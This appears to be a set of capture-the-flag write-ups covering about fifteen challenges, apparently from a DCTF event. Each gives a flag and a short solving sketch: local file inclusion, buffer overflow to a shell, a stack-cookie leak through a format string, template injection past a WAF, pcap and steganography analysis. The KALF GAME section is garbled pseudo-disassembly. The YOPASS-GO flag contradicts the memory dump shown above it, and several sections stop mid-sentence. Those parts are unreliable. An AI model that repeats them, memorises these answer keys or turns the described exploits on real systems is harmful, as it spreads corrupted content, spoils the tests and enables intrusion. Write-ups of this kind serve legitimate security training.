ALIEN INCLUSION #

Proof of flag #

FLAG = ctf{b513ef6d1a5735810bca608be42bda8ef28840ee458df4a3508d25e4b706134d}

Summary of the vulnerabilities identified #

We can control which file we are includingg using the start post parameter and we can set it to the path of the flag.php file.

Proof of solving #

When we first access the page we are greeted by what seems to be the source code of the index.php file. Based on this source code, the name of the challenge and its description “Keep it local and you should be fine. The flag is in /var/www/html/flag.php.”, it is obvious we need to set the value of the “start” POST parameter to the absolute path of the flag and to also add a random value for the start GET parameter (also known as a query argument) in order to provent the exit on line 5 from ever being executed.

BASIC COMS #

Proof of flag #

FLAG = ctf{ca314be22457497e81a08fc3bfdbdcd3e0e443c41b5ce9802517b2161aa5e993}

Summary of the vulnerabilities identified #

Looking for http requests captured by Wireshark in the given file we find only 4 request, one of which contains our flag as a GET parameter.

Proof of solving #

Based on the challenge description and title, we know we are supposed to be looking for a “basic” protocol in the pcapng file. One of the most basic protocols available is http and we in Wireshark we can filter to look only at the http requests and responses. Since there are only 4 requests made and the fact that there is a somewhat encoded message which says “The content of the flag is” we can guess that

BAZOOKA #

Proof of flag #

ctf{9bb6df8e98240b46601db436ad276eaa635a846c9a5afa5b2075907adf39244b}

Summary of the vulnerabilities identified #

Just a super simple buffer overflow(Don’t need to tell me “Try Harder” mom).

Proof of solving #

The program in the first part prompts the user to input "#!@{try_hard3r}" to go on the vuln function, where the buffer overrun happens by using “%s” in the scanf format string and not “%Xs”, where X is a natural number. First I find the libc base address and use an ONE Gadget to land me on an execve("/bin/sh", 0, 0)

BRO64 #

Proof of flag #

ctf{f38deb0782c0f252090a52b2f1a5b05bf2964272f65d5c3580be631f52f4b3e0}

Summary of the vulnerabilities identified #

By connecting with netcat and sending some data you would get an HTTP Bad Request Error.

nc 35.198.183.125 31604
asdf
<head></head>
<title>Error response</title>

<body></body>
<h1>Error response</h1>
Error code 400.
Message: Bad request syntax ('asdf').
Error code explanation: 400 = Bad request syntax or unsupported method.

So the natural thing is to use curl. By using curl you whould get some and weird json data.

DARKMAGIC #

Proof of flag #

dctf{857ee5051eeccf7cbdfa0ab9986d32f89158429fc12348e15419a969ddcb6bfb}

Summary of the vulnerabilities identified #

The vulnerability was a format string + a buffer overflow.

Proof of solving #

You need to use the format string to leak the stack cookie and with the buffer overflow to redirect code execution to the getshell function. Everything happens in a loop and we overwrite the loop variable from 1 to 2 by sending 100 “A"s and a ‘\x02’ , and by sending “%35$p” you get the value of the stack cookie. I used 0x40087a to send the execution to a ret instruction because I get a misaligned stack and the program crashes.

DUMB-DISCORD #

Proof of flag #

ctf{1b8fa7f33da67dfeb1d5f79850dcf13630b5563e98566bf7b76281d409d728c6}

Summary of the vulnerabilities identified #

Invite the bot to a Discord server, give it the ‘dctf2020.cyberedu.ro’ role, use the payload ‘/s基ay //getflaggetflag’ to get the encoded flag and then decode it.

Proof of solving #

First off, we need to decompile the binary using ‘uncompyle6’ and look at the code. But before I copy paste all the code we need to replace the obfuscated strings. A simple xor encoding is used, and we can use the included decoding function to replace them with the real strings. And we end up with this:

HTTP-FOR-PROS #

Proof of flag #

CTF{75df3454a132fcdd37d94882e343c6a23e961ed70f8dd88195345aa874c63e63}

Summary of the vulnerabilities identified #

The application is vulnerable to Server Side Template Injection via the content GET parameter and can be used to get code execution on the system. It is not very straightforward since there is also a Web Application Firewall that is filtering our requests and looking for forbidden words in our requests. The solution is to use Python String formatting in order to split the forbidden words so that they won’t be matched.

KALF GAME #

Proof of flag #

01660706613050         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         00007061         000007061         00007061         00007061

Bodderfore:304-3]         Cold XHF from from from SoftWork:34x3 () 0x560706423648         1.5 0x04111           SoftWork:31xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

msderodec3865f (dby)]         20           coderodec3865f (dby)]         20           coderodec3865f (dby)]         20           msderodec3865f (dby)]         21           msderodec3865f (dby)]         21           msderodec3865f (dby)]         21           msderodec3865f (dby)         21           msderodec3865f (dby)         21           msderodec3865f (dby)         21           msderodec3866f (dby)         21           msderodec3866f (dby)         21           msderodec3866f (dby)         21           msderodec3866f (dby)         21           msderodec3866f (dby)         21           msderodec3866f (dby)         21           msderodec3866f (dby)         21           msderodec3866f (dby)         21           msderodec386f (dby)         21           msderodec386f (dby)         21           msderodec386f (dby)         21           msderodec386f (dby)         21           msderodec386f (dby)         21           msderodec386f (dby)         21           msderodec386f (dby)         21           msderodec386f (dby)         21

0x560706c35072 [dbt]           0x560706c35072 [dbt]           0x560706c35072 (dbt]           0x560706c35072 488040377640. tea rax, [sym.care::ptr::drop_(n_place::h14b254b3868f5bb2]           0x560706c35092 48804c34083. tea rdx, [var_s607]           0x560706c35092 48804c34083. tea rdx, [var_s607]           0x560706c35092 6000 [m 0 000676c35685

0.569760:35685 [of:a]
; (OCS.3985 Trom from, from, 507.562786233867
scientifications: ebility jup exclamation ebility

:> dso ctf{ddba6614a32 hit breakpoint :>

ctf{ddba6614a32456631c125eb1a4327c52686c71d909a92ec05ea5eb510eae81d9}

Summary of the vulnerabilities identified #

The game is a basic snake game(which is the best game of snake I ever played, thank you Lucian, you made my day happier) and hides the flag using strings that are stored on the stack and a cool function like rot13, and the best thing it was written in rust which is the best language so far for humanity.

MODERN LOGIN Proof of flag

ctf{356c5e791de08610b8e9cb00a64d16c2cfc2be00b133fdfa5198420214909cc1}

Summary of the vulnerabilities identified #

Challenge APK file can be easily decompiled using online services, scrolling through source files and assets we notice a mp3 which is not playable. Running file command on it we observe it is an archive, we decompress it and find obfuscated Python code. Cleaning up the code we start decoding the obfuscated strings in it and one of them is our flag.

QR-MANIA #

Proof of flag #

CTF{2b2e8580cdf35896d75bfc4b1bafff6ee90f6c525da3b9a26dd7726bf2171396}

Summary of the vulnerabilities identified #

Inspecting the pcap file with wireshark I found HTTP responses with png images, each one containing a qr code, which decodes to a single character. The position of each character is inside the exif data of the corresponding image.

Proof of solving #

Extract HTTP objects with wireshark from the provided .pcap file:

STRIPPEDGO #

Proof of flag #

ctf{a4e394ae892144a54c008a3b480a1b22a6b64dd26c4b0c9eba498330f511b51e}

Summary of the vulnerabilities identified #

Seek to the main of the program (sym.go.main.main) and extract the string before it gets encrypted

Proof of solving #

We start off by running file

$ file rev_strippedGo_strippedGO
rev_strippedGo_strippedGO: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically
linked, Go
BuildID=pbHcqNyu7oMwNz2AOwlC/ipoepuEEs9kTpe_InyYc/zxH96PaxbdfxJ2l96QnT/-SUbqa7STSlM69LnCs6A,
stripped

So it’s a go binary and it’s stripped, at least the title didn’t lie to us. We open it up in radare.

STUG-REFERENCE #

Proof of flag #

ctf{32849dd9d7e7b313c214a7b1d004b776b4af0cedd9730e6ca05ef725a18e38e1}

Summary of the vulnerabilities identified #

Use steghide to extract the flag from stug.jpg with password stug.

Proof of solving #

My teammates tried a lot of stuff, including brute forcing it with rockyou and a lot of stegano stuff. I tried some “obvious” passwords like “dctf”, “dctf2020” and “stug”. And stug ended up working out.

T3AM_VI3W3R #

Proof of flag #

DCTF{74a0f35841dfa7eddf5a87467c90da335132ae52c58ca440f31a53483cef7eac}

Summary of the vulnerabilities identified #

Analysis on the VNC protocol.

Proof of solving #

After firing up Wireshark and Loading the provided .pcapng, we filter for the VNC protocol. We follow the TCP stream of the first entry and we find out that it spells out words with doubled letters.

The stream can be saved for later processing in a .txt format. We get rid of the extra letters and dots and we end up with a message that says :

WHY-XOR #

Proof of flag #

ctf{79f107231696395c004e87dd7709d3990f0d602a57e9f56ac428b31138bda258}

Summary of the vulnerabilities identified #

We have a xored flag and it starts 3 null bytes, so we can assume the key at least starts with “ctf”. And that turns out to be the correct key

Proof of solving #

So I started out by reading the challenge description where it clearly says that the flag format is “CTF{sha256}” so of course I tried “CTF” as the key, but that didn’t work so I was really confused for some time.

YOPASS-GO #

Proof of flag #

pwndbg> x/69c 0x4c55f2
0x4c55f2: 99 'c' 116 't' 102 'f' 123 '{' 48 '0' 57 '9' 54 '6' 50 '2'
0x4c55fa: 51 '3' 57 '9' 51 '3' 99 'c' 101 'e' 51 '3' 56 '8' 48 '0'
0x4c5602: 99 'c' 51 '3' 99 'c' 102 'f' 54 '6' 57 '9' 54 '6' 99 'c'
0x4c560a: 54 '6' 99 'c' 53 '5' 57 '9' 97 'a' 48 '0' 56 '8' 53 '5'
0x4c5612: 99 'c' 100 'd' 101 'e' 48 '0' 102 'f' 55 '7' 101 'e' 100 'd'
0x4c561a: 100 'd' 49 '1' 51 '3' 56 '8' 50 '2' 102 'f' 50 '2' 101 'e'
0x4c5622: 57 '9' 48 '0' 57 '9' 48 '0' 50 '2' 50 '2' 48 '0' 97 'a'
0x4c562a: 98 'b' 100 'd' 102 'f' 57 '9' 97 'a' 54 '6' 51 '3' 57 '9'
0x4c5632: 54 '6' 99 'c' 56 '8' 56 '8' 125 '}'
pwndbg> x/1s 0x4c55f2
0x4c55f2: "ctf{09052393ce380c3cf696c6c59a085cde0f7edd1382f2e90902200abdf9a6396c88"

ctf{0962393ce380c3cf696c6c59a085cde0f7edd1382f2e9090220abdf9a6396c88}

Summary of the vulnerabilities identified #

Following the execution of the binary in gdb, I found a “memequal” call having as parameters the input string and the flag in memory.